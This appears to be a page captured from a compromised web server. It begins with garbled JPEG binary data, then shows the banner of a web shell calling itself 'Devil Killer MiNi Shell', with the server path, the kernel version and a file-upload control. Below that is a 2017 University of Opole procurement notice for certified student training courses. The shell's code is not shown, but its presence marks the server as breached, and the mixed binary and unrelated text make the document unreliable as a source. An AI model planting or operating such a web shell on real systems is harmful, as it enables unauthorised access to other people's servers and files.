JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20170414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20170414/67138-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zamowienia.uni.opole.pl/' target='_blank'>http://www.zamowienia.uni.opole.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 67138 - 2017
              z dnia 2017-04-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opole: Usługa przeprowadzenia certyfikowanych szkoleń/warsztatów podnoszących kompetencje kluczowe studentów z kierunków Biotechnologia, Architektura Krajobrazu i Informatyka wraz z certyfikacją, w ramach projektu Gotowi na rynek pracy! <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Gotowi na rynek pracy!;  nr projektu: POWR.03.01.00-00-K419/15</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Uniwersytet  Opolski, krajowy numer identyfikacyjny
              138200000, ul.
              Pl. Kopernika 
              11 A,
              45-040  
              Opole, woj.
              opolskie, państwo
              Polska, tel.
              077 5 415977, e-mail
              zamowienia@uni.opole.pl, faks
              775 415 930.
              <br />
              Adres strony internetowej (URL): http://www.zamowienia.uni.opole.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Ucelnia publiczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.zamowienia.uni.opole.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.zamowienia.uni.opole.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie<br />
                Adres:
                <br />Uniwersytet Opolski, Dział Zamówień Publicznych, 45-040 Opole, Pl. Kopernika 11A, pokój nr 2-3</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa przeprowadzenia certyfikowanych szkoleń/warsztatów podnoszących kompetencje kluczowe studentów z kierunków Biotechnologia, Architektura Krajobrazu i Informatyka wraz z certyfikacją, w ramach projektu Gotowi na rynek pracy! <br /><b>Numer referencyjny: </b>U/24/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest: Usługa przeprowadzenia certyfikowanych szkoleń/warsztatów podnoszących kompetencje kluczowe studentów z kierunków Biotechnologia, Architektura Krajobrazu i Informatyka wraz z certyfikacją, w ramach projektu Gotowi na rynek pracy! 
w podziale na trzy [ 3 ] części:
Części nr 1: Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Architektura Krajobrazu.
Części nr 2: Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Biotechnologia.
Części nr 3: Przeprowadzenie certyfikowanych szkoleń/warsztatów dla studentów kierunku Informatyka.
Opis przedmiotu zamówienia dla każdej z poszczególnych części został określony w załączniku nr 1A do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych. 
Przedmiotem zamówienia jest usługa szkoleniowa oraz usługa certyfikacji  dla trzech [ 3 ] grup studentów (uczestników projektu) Uniwersytetu Opolskiego  w ramach każdej części postępowania.
Zamawiający zapewni grupy składające się z minimum dziesięciu [ 10 ] a maksimum dwudziestu 
[ 20 ] osób. 

Zakres obowiązków Wykonawcy (odpowiednio do części)
Wskazanie osób do stałej współpracy z przedstawicielem Zamawiającego.
Opracowanie harmonogramu rzeczowego realizacji usług w zakresie szkoleń
 i certyfikacji w uzgodnieniu z Zamawiającym.
Opracowanie szczegółowego programu szkoleń i przedłożenie do akceptacji Zamawiającego.
Wskazanie osób prowadzących szkolenia.
Przeprowadzenie szkoleń dla trzech [ 3 ] grup studentów w wymiarze osiemdziesięciu [ 80 ] h (szkoleniowych  45 min) na każdą grupę (dziesięć [ 10 ] dni kalendarzowych x osiem [ 8 ] h) zgodnie z zakresem merytorycznym określonym w opisie przedmiotu zamówienia (załącznik nr 1A do SIWZ)  łącznie dwieście 240 h szkoleniowych (osiemdziesiąt [ 80 ] h x trzy [ 3 ] grupy).
Przeprowadzenie pre- i post-testów wśród uczestników, oceniających poziom kluczowych kompetencji uczestników na rozpoczęcie i na zakończenie szkolenia.
Certyfikacja umiejętności uzyskanych w trakcie szkoleń.
Sporządzenie dokumentacji z przeprowadzonych szkoleń zgodnie z umową oraz wytycznymi Zamawiającego, w szczególności:
List obecności uczestników podczas szkoleń.
Dokumentacji fotograficznej ze szkoleń.
Pre- i post-testów wypełnionych przez uczestników.
Kopii certyfikatów wydanych uczestnikom.
Przekazanie kompletnej dokumentacji Zamawiającemu w terminie do trzech [ 3 ] dni kalendarzowych po przeprowadzeniu każdego szkolenia.
W przypadku konieczności wprowadzenia poprawek lub aktualizacji przygotowanych dokumentów  wprowadzenie poprawek w terminie do trzech [ 3 ]  dni kalendarzowych od dnia stwierdzenia nieprawidłowości lub konieczności aktualizacji.
Współpraca z personelem projektu.
Wykonawca zobowiązany jest do zapewnienia podmiotu posiadającego uprawnienia do przeprowadzenia egzaminu certyfikującego do każdego zadania  w sytuacji, gdy sam nie posiada takich uprawnień. Certyfikacja będzie się odbywała po zakończeniu każdego szkolenia dla każdej grupy studentów. Do zadań podmiotu należeć będzie przygotowanie sesji egzaminacyjnej dla każdej grupy uczestników szkoleń Gotowi na rynek pracy!  na terenie miasta Opole (tylko w przypadku, gdy istnieje możliwość certyfikacji w Opolu, w pozostałych przypadkach dopuszcza się certyfikację poza Opolem). 
Wszelkie materiały związane z realizacją zamówienia muszą być przekazywane Zamawiającemu pisemnie tj.: w wersji papierowej przy jednoczesnym przesłaniu wersji elektronicznej.
Zadaniem Wykonawcy jest kompleksowa usługa szkoleniowa dla uczestników projektu  studenci wyżej wskazanych kierunków, wraz z certyfikacją. 
Wykonawca zobowiązany jest prezentować profesjonalne podejście do zamówienia, zapewnić 
i zagwarantować poprawność i efektywność realizowanych działań, jak również wysoką, jakość opracowywanych dokumentów oraz usług (szkolenie i certyfikacja). 
Odpowiedzialność za koordynację i organizację pracy trenerów/szkoleniowców ponosi Wykonawca. 

Wykonawca prowadząc certyfikowane szkolenia musi dysponować odpowiednią kadrą, posiadać kompetencje, zasób umiejętności i wiedzy zgodnych z wymaganiami przedstawionymi przez Zamawiającego, które umożliwią udzielenie wsparcia beneficjentom projektu na poziomie wymaganym 
w projekcie.

Miejsce realizacji zamówienia (odpowiednio do części)
Realizowanie szkoleń w salach zapewnionych przez Wykonawcę musi odbywać się na terenie miasta Opola.
W przypadku szkoleń wymagających sprzętu komputerowego i oprogramowania, Wykonawca jest zobowiązany zapewnić salę spełniającą wymagania, znajdującą się na terenie miasta Opola 
z dostępem do sprzętu umożliwiającego przeprowadzenie szkoleń. 
Za wynajem sal Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
Zamawiający w ramach poszczególnych części zamierza przeznaczyć na sfinansowanie zamówienia na:
Część nr 1	
1a) Przeprowadzenie szkolenia	53 250,00 złotych brutto
	1b) Certyfikacja	11 250,00 złotych brutto
Część nr 2	
2a) Przeprowadzenie szkolenia	53 250,00 złotych brutto
	2b) Certyfikacja	11 250,00 złotych brutto
Część nr 3	
3a) Przeprowadzenie szkolenia	39 050,00 złotych brutto
	3b) Certyfikacja	8 250,00 złotych brutto



<br /><br /><b>II.5) Główny kod CPV: </b>80000000-4<br /><b> Dodatkowe kody CPV:</b>80500000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/05/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 28/02/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Termin wykonania przedmiotu zamówienia:
w Części nr 1: od zawarcia umowy do trzydziestego maja dwa tysiące siedemnastego 
[30.05.2017] roku.
w Części nr 2: od zawarcia umowy do trzydziestego pierwszego grudnia dwa tysiące     siedemnastego [ 31.12.2017 ] roku.
w Części nr 3: od zawarcia umowy do dwudziestego ósmego lutego dwa tysiące     osiemnastego [ 28.02.2018 ] roku.                   
Termin zawarcia umowy zostanie wyznaczony przez Zamawiającego, niezwłocznie (zgodnie z art. 94. ustawy) po dokonaniu wyboru najkorzystniejszej oferty. Miejscem zawarcia umowy będzie siedziba Zamawiającego.
W przypadku niestawiennictwa Wykonawcy w wyznaczonym przez Zamawiającego terminie 
i miejscu, umowa (podpisana ze strony Zamawiającego) zostanie przesłana Wykonawcy 
za pośrednictwem poczty tradycyjnej. Jednocześnie data zawarcia umowy pozostanie niezmienna, zgodna z terminem zawarcia umowy wyznaczonym przez Zamawiającego (zgodnie z pkt. 4.2. SIWZ).
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek określony w art. 22. ust. 1b. pkt 3) ustawy tj.: dotyczący zdolności technicznej lub zawodowej, tj.:

w Części nr 1: Warunek będzie uznany za spełniony, jeżeli z treści dokumentów będzie wynikać, że Wykonawca dysponuje:
Osobą*  odpowiedzialną za szkolenia podnoszące kompetencje zawodowe 
w zakresie obsługi programu autoCAD, tj.:
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) licencjackie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum B2.
Osobą posiadającą uprawnienia do przeprowadzenia szkolenia 
z obsługi programu autoCAD.
Osobą odpowiedzialną za przeprowadzenie szkolenia z zakresu komunikacji, asertywności oraz odporności na stres, tj.:
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) licencjackie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum B2.
Osobą posiadającą minimum osiemdziesięcio- [ 80 ] godzinne doświadczenie w prowadzeniu szkoleń z zakresu komunikacji, asertywności oraz odporności na stres.

w Części nr 2: Warunek będzie uznany za spełniony, jeżeli z treści dokumentów będzie wynikać, że Wykonawca dysponuje: 
Osoba odpowiedzialna za szkolenia podnoszącego kompetencje zawodowe 
w zakresie Auditor wewnętrzny HACCP, tj.:
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) licencjackie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum B2.
Osobą posiadającą uprawnienia do przeprowadzenia szkolenia 
z obsługi programu Auditor wewnętrzny HACCP.
Osobą odpowiedzialną za przeprowadzenie szkolenia z zakresu planowania 
i organizacji pracy, przywództwa i kierowania, rozwiązywania zadań, tj.:
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) licencjackie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum B2.
Osobą posiadającą minimum osiemdziesięcio- [ 80 ] godzinne doświadczenie w prowadzeniu szkoleń z zakresu planowania 
i organizacji pracy, przywództwa i kierowania, rozwiązywania zadań.

w Części nr 3: Warunek będzie uznany za spełniony, jeżeli z treści dokumentów będzie wynikać, że Wykonawca dysponuje: 
Osobą*  odpowiedzialną za szkolenia podnoszące kompetencje zawodowe 
w zakresie programowania w języku C#: Microsoft Programming in C#, tj.:
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) inżynierskie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum C2.
Osobą posiadającą: uprawnienia do przeprowadzenia szkolenia 
z zakresu programowania w języku C#: Microsoft Programming in C#; certyfikację Microsoft MCP od co najmniej pieciu [ 5 ] lat; zdany egzamin Microsoft xx483: Programming in C#.
Doświadczenie w prowadzeniu szkoleń podnoszących kompetencje z zakresu technologii IT.
Osobą odpowiedzialną za przeprowadzenie szkolenia z zakresu komunikacji, asertywności oraz odporności na stres, tj.: 
Osobą posiadającą wykształcenie wyższe (minimum pierwszego 
[ 1 ] stopnia) licencjackie.
Osobą posiadającą kwalifikacje językowe z zakresu języka angielskiego na poziomie minimum B2.
Osobą posiadającą minimum osiemdziesięcio- [ 80 ] godzinne doświadczenie w prowadzeniu szkoleń z zakresu komunikacji, asertywności oraz odporności na stres.
*Nie dopuszcza się wykorzystywania podczas szkolenia wielu trenerów.
**Osoba ma posiadać wszystkie powyższe kompetencje. Nie dopuszcza się wykorzystywania podczas szkolenia wielu trenerów i/lub tłumacza.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  nie
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia okoliczności o których mowa w art. 25. ust. 1. pkt 3)  ustawy, tj.: braku podstaw wykluczenia Zamawiający żąda dostarczenia następujących dokumentów/oświadczeń przez Wykonawcę 
Oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej (zgodnie z załącznikiem nr 3A do SIWZ). W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji 
w postępowaniu (w przypadku jeżeli Wykonawca nie dostarczy Zamawiającemu tego oświadczania zgodnie z pkt 7. SIWZ, tj.:w terminie trzech [ 3 ] dni od dnia przekazania informacji, o której mowa w art. 86. ust. 5. ustawy (to jest Protokołu z otwarcia ofert), zobowiązany jest przekazać Zamawiającemu oświadczenie  
o przynależności lub braku przynależności do tej samej grupy kapitałowej (zgodnie z załącznikiem 
nr 3A do SIWZ), o której mowa w art. 24. ust. 1. pkt 23) ustawy. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia). 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />w części nr 1, w części nr 2, w części nr 3:
Wykaz osób (zgodnie z załącznikiem nr 5A-5C do SIWZ  odpowiednio do części), skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z:
w części nr 1-2: (odpowiednio do części)
Kopią*  dyplomu potwierdzającego wykształcenie dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
Kopią* certyfikatu lub kopią* dokumentu potwierdzającego zdany egzamin, potwierdzający kwalifikacje językowe dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
Kopią* licencji lub kopią* certyfikatu lub kopią* dokumentów potwierdzających wykonanie usług z zakresu odpowiednio: obsługi programu autoCAD lub Auditor wewnętrzny HACCP dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
Kopią* dokumentów potwierdzających doświadczenie dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
w części nr 3:
Kopią*  dyplomu potwierdzającego wykształcenie dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
Kopią* certyfikatu potwierdzającego kwalifikacje językowe dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
Kopią* licencji lub kopią* certyfikatu lub kopią* dokumentów potwierdzających możliwość przeprowadzenia szkolenia z zakresu programowania w języku C#: Microsoft Programming in C# (certyfikacja Microsoft MCP od co najmniej 5 lat, zdany egzamin Microsoft xx483: Programming in C#) dla osoby/osób wymienionej/ych przez Wykonawcę 
w Wykazie osób.
Kopią* dokumentów potwierdzających doświadczenie dla osoby/osób wymienionej/ych przez Wykonawcę w Wykazie osób.
*Kopię potwierdzoną za zgodność z oryginałem przez Wykonawcę.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
